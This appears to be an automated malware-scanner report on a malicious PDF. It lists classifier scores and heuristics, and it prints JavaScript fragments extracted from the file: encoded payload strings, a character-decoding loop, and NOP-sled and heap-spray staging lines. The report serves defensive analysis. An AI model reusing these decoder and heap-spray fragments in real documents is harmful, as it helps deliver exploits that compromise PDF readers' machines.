MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript streams and the use of String.fromCharCode, indicating obfuscation techniques. The presence of JavaScript actions within the PDF structure suggests an attempt to execute arbitrary code. No specific family could be identified, but the techniques used are common for PDF-based malware delivery.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/S /JavaScript /JS (var nops='';for\(i=0;i<nnn2.length;i+=4\){c=0;for\(j=0;j<4;j++\)c=16*c+nnn2.charCodeAt\(i+j\)-65;nops+=String.fromCharCode\(c\);}) >> -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 32
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0010_001.js |
pdf-javascript-stream | PDF /JS object 10 at offset 0x369F | 40 bytes |
SHA-256: f9ae5a33db8c7c1304813e927490f51369c0114e1b7e481ce8d3cc0f2f95f72e |
|||
Preview scriptFirst 1,000 lines of the extracted script
var ppp=new Array();var nnn=new Array(); |
|||
javascript_obj0012_003.js |
pdf-javascript-stream | PDF /JS object 12 at offset 0x375B | 86 bytes |
SHA-256: d3db7dd98187ed7f4fc953f90f55dbb90ffe81f408bd91f2f213e7016c644722 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[1]='CEPECLMJFKLBLFDBECBDADECBDIDMCMELLJMFIANOBJCCDANBALIIANEGJOGNMFHDPLLCNNCFHMH'; |
|||
javascript_obj0014_005.js |
pdf-javascript-stream | PDF /JS object 14 at offset 0x383B | 44 bytes |
SHA-256: 7342f2e2ce3b5f8b70ea52c219c488b46c66ba6ba8f9752b018c001a9bdc88d2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[3]='KJCEDGCLFMBGIJAPFDFCJNNOIJIFAOMJHC'; |
|||
javascript_obj0015_006.js |
pdf-javascript-stream | PDF /JS object 15 at offset 0x38A1 | 84 bytes |
SHA-256: 946b17dcf6a4d3f82cda790f4fb07a2af061646e26fb8e5441a1a41a217ab1a2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[4]='HAEDMLAKHMKNCMOFINFPGFFNJFLPFKMMIOLMJGPLJHAGHCCMLJDALMJBGPADOFFCIMEHABDOFL'; |
|||
javascript_obj0016_007.js |
pdf-javascript-stream | PDF /JS object 16 at offset 0x392F | 92 bytes |
SHA-256: f3c389e26cd51de99e501bdfb67f595ee7e84fc5872d234e733727179f65e66b |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[5]='EKAJKACKIDNLFGAJGOICNFNLBBBLGJLBOBJIBFBPNPELMDOFBLPOMENGNMGCPGMGNMBIAOJCFBHHJEPOKE'; |
|||
javascript_obj0017_008.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x39C5 | 54 bytes |
SHA-256: 5ba0c923df9fa631eadc1a2b82288bcd9080ae7434d0ad70c947f8a88598cc21 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[6]='KAACLFNNPGIHBMHPHHEMLBIBHHCEHFOOCIPFNKOFHLFI'; |
|||
javascript_obj0018_009.js |
pdf-javascript-stream | PDF /JS object 18 at offset 0x3A35 | 84 bytes |
SHA-256: 18b1c02098373ec499d9c620b6fccb378e25ada72c8083129bdf7c43b8844375 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[7]='HFLDMBBIPFDOHAFDLICMIKHOKAAHGJPJPIJKHLDNGIEAGIENFBPPPDBEFEOOJJJICJJICEAONM'; |
|||
javascript_obj0019_010.js |
pdf-javascript-stream | PDF /JS object 19 at offset 0x3AC3 | 64 bytes |
SHA-256: 995dbc1ce05e3c001d7888bf8df48cdd57346661a84825163166724f9f877e72 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[8]='PCPNGJKEMGONJECGBFJNOIMHFMCCBCAPHGHKGHEFGEMNCOOKDMLMBL'; |
|||
javascript_obj0020_011.js |
pdf-javascript-stream | PDF /JS object 20 at offset 0x3B3D | 60 bytes |
SHA-256: 57ba47b2c151d8e0615eebfbfed2d14cee8ccc3614febfb5b9eab1f4bb893a6c |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[9]='MACIFKCNBFLHMHPLOALABOJDKINPJNFNBEHCJJKONLFJLPBOFN'; |
|||
javascript_obj0021_012.js |
pdf-javascript-stream | PDF /JS object 21 at offset 0x3BB3 | 61 bytes |
SHA-256: 78021d6f1e23f18f20dc4d852e5466a202bc326e656c50af383468cf33c2a728 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[10]='OLLEGGJHEAFLKOGMMMPCGKEHPHFBHBMOPBEPACGKIEIEPBIBAO'; |
|||
javascript_obj0022_013.js |
pdf-javascript-stream | PDF /JS object 22 at offset 0x3C2A | 73 bytes |
SHA-256: e7ed5cfa68cc8745b3c00ba61d9a3bb339656b980a099c0b8368a0cd31af772a |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[11]='CHAEOLMPBIMMPOMALPDMOFOIDGIKBNEKMMGICEBJEFIBMKKNCOOLDOPMNGONHF'; |
|||
javascript_obj0024_015.js |
pdf-javascript-stream | PDF /JS object 24 at offset 0x3CF8 | 45 bytes |
SHA-256: f5858eeb26a8e226da712a59d170ee5563cfe6c823bf18cd478f5c69bc21b868 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[13]='EGPDMFOIDGGOJMKBEIFCHEGAGOPHCAMCEK'; |
|||
javascript_obj0025_016.js |
pdf-javascript-stream | PDF /JS object 25 at offset 0x3D5F | 57 bytes |
SHA-256: 2d1b23b45f293954ea379799b242ac22e4524d1eb5a8b18292b67ee28f793514 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[14]='FJIJGMNOOGICADNFPMHMJCBLAFLFLJJMGHIKAENFDJPILH'; |
|||
javascript_obj0026_017.js |
pdf-javascript-stream | PDF /JS object 26 at offset 0x3DD2 | 49 bytes |
SHA-256: 5856d3c2558bc11c5cf1553c078f122447fdcdb5ecf79f9a9c5790c6ab22bb87 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[15]='JDAOHMLEFIGLOGPOJBOGBAFPIHGGDFCLEECHDC'; |
|||
javascript_obj0027_018.js |
pdf-javascript-stream | PDF /JS object 27 at offset 0x3E3D | 65 bytes |
SHA-256: 39a06a9254a943bc2141243373c252c13e781c330f56b7c26cda1951a2375518 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[16]='EDICAFPGGCCIKALOJPNOPJOKDDPMHAMODCDOCCJOGEKJJIKBPFGBNO'; |
|||
javascript_obj0031_022.js |
pdf-javascript-stream | PDF /JS object 31 at offset 0x3FA7 | 67 bytes |
SHA-256: 1ab7e5d8ceb50cf464f33d5645516e5efc26ebb8a3efa768e6397311e71fdc0e |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[20]='OPBIAFLNHFMKMEMAGIBABMFDKKBPLKNOKBNIBICCMDOGNGFJFEAMIGFK'; |
|||
javascript_obj0032_023.js |
pdf-javascript-stream | PDF /JS object 32 at offset 0x4024 | 85 bytes |
SHA-256: e266473448dd6748ecec1dd1bc6dbbe19259bbceab8e72ef32f38965cd071f8f |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[21]='PBDCPAPBLPEKACBMIEHMFNIPDDGIEJPMPLNPMBKLJIHAONKMOLFIPAGEDOJJJGPMIBOKGJPKMP'; |
|||
javascript_obj0033_024.js |
pdf-javascript-stream | PDF /JS object 33 at offset 0x40B3 | 97 bytes |
SHA-256: 760a36914575b76538c0baeb9758a2c5e92407a6d945bb734561d11df8bfa433 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[22]='JGMKIDHMAAGGGCNJEAICCAMAAKKKHNHEPMDBILEJLJLLBNAOEHOBGDPBOAHFMPOBGJNBMJIJJAOHLMDGCNNBOD'; |
|||
javascript_obj0034_025.js |
pdf-javascript-stream | PDF /JS object 34 at offset 0x414E | 77 bytes |
SHA-256: bf7aa9a20bedefde679dbdbf11b8eb4bd5dde4b24f23a6cfc410d901f65c37cf |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[23]='LIFPOHJOFAAECFEMEDFNNDANOLKHMGHHCEIBIPCAELLLKFDMPGBLOKCHJEIJDNBMMD'; |
|||
javascript_obj0036_027.js |
pdf-javascript-stream | PDF /JS object 36 at offset 0x4226 | 51 bytes |
SHA-256: e8a0e21d67b77a668cae65199ef0c68249f77161aaaaaf566bb3d6458cf0cdfe |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[25]='FMNJAENBANLLHEGAINNBJBIIIGGNKJFILDHBJEKK'; |
|||
javascript_obj0038_029.js |
pdf-javascript-stream | PDF /JS object 38 at offset 0x42DC | 57 bytes |
SHA-256: 495b119775e9a58f1e4689779bc201f2929505f3ce12d7047cc9e44ecdaededa |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[27]='CENAGBCAANLEPHDINEFKKAPFPNFJCFJNBBBLHCIPDNEMPI'; |
|||
javascript_obj0039_030.js |
pdf-javascript-stream | PDF /JS object 39 at offset 0x434F | 95 bytes |
SHA-256: f2d2cbb5871c013d1d55a1cd338047ffe5aab3f7e0a8727038111bb871aac5d6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[28]='FLHAOCDHEOKBKAPFHJHGPDPLMNKKMKAPIPPEFBGCIEFNFPAKEJDFCJHMODDEHBBBPJHNHGHGMIGMCDKNBLOD'; |
|||
javascript_obj0041_032.js |
pdf-javascript-stream | PDF /JS object 41 at offset 0x4437 | 35 bytes |
SHA-256: 16ed55b24490aa1d8a6b62c27472c096320f97307e7875a9615f44ea7e8f4b08 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[30]='PIFGOHMFEEKNEKEBGEHGHLCD'; |
|||
javascript_obj0044_035.js |
pdf-javascript-stream | PDF /JS object 44 at offset 0x453A | 77 bytes |
SHA-256: d594ca9b5d39251b8917d295c4a55e9a5333847e1956651d11a55476ed07b4e3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[33]='HHHGJBGMKLDKHAMCMJHBMKIHHNFFJJBGDFGLPLCOAJNLMKEODHBNIGJMLIDJJEEEGI'; |
|||
javascript_obj0045_036.js |
pdf-javascript-stream | PDF /JS object 45 at offset 0x45C1 | 33 bytes |
SHA-256: f2175d4dc34113ce2969de7b3f349e4eb1ba80af850e18be9097e832a0872cd2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[34]='LJMKFFFAJPLDPCKKFIPCPO'; |
|||
javascript_obj0046_037.js |
pdf-javascript-stream | PDF /JS object 46 at offset 0x461C | 49 bytes |
SHA-256: c2e8698a64839df4f8ec75a196ecd78212a05e31eb3a22e3e12cd8e606e10cbc |
|||
Preview scriptFirst 1,000 lines of the extracted script
ppp[35]='EEJBMNKNGEDIKNCFDDLGHNJINPDDILODMHKLMB'; |
|||
javascript_obj0055_046.js |
pdf-javascript-stream | PDF /JS object 55 at offset 0x48C7 | 49 bytes |
SHA-256: 5919c0d1d84a5a746be9f27963881ad88d4190b52b00795a7bba41f91757774f |
|||
Preview scriptFirst 1,000 lines of the extracted script
var pay='';for (i=0;i<ppp.length;i++)pay+=ppp[i]; |
|||
javascript_obj0056_047.js |
pdf-javascript-stream | PDF /JS object 56 at offset 0x4934 | 51 bytes |
SHA-256: 9882b77792295f132527561d187f85c94b2cd973564768e464959f18c36b3adf |
|||
Preview scriptFirst 1,000 lines of the extracted script
var nnn2='';for (i=0;i<nnn.length;i++)nnn2+=nnn[i]; |
|||
javascript_obj0057_048.js |
pdf-javascript-stream | PDF /JS object 57 at offset 0x49A3 | 121 bytes |
SHA-256: d0c51bf80c2b774fd7e3f148d01ffbc945e29725fa0df8312c7ee2e2af01f03e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var nops='';for(i=0;i<nnn2.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+nnn2.charCodeAt(i+j)-65;nops+=String.fromCharCode(c);}
|
|||
javascript_obj0058_049.js |
pdf-javascript-stream | PDF /JS object 58 at offset 0x4A5E | 119 bytes |
SHA-256: b1b2b43288ce70ec200b2f13b08007f27b53e440ecc0d66f3597d77149e048d4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var coqu='';for(i=0;i<pay.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+pay.charCodeAt(i+j)-65;coqu+=String.fromCharCode(c);}
|
|||
javascript_obj0059_050.js |
pdf-javascript-stream | PDF /JS object 59 at offset 0x4B17 | 42 bytes |
SHA-256: cdb00d413dd3dc5b9d3e3780f1775e73dbb44b071a24019bd9d4f5472f12fea2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var nop='';for(i=0;i<128;i++)nop=nop+nops; |
|||
javascript_obj0060_051.js |
pdf-javascript-stream | PDF /JS object 60 at offset 0x4B7D | 40 bytes |
SHA-256: 8685060b59c6fc8b97b63aec5887d1ab60834301ec5794892d52bb5db733a84c |
|||
Preview scriptFirst 1,000 lines of the extracted script
hpb=nop+coqu;big=nops;spr=20+hpb.length; |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.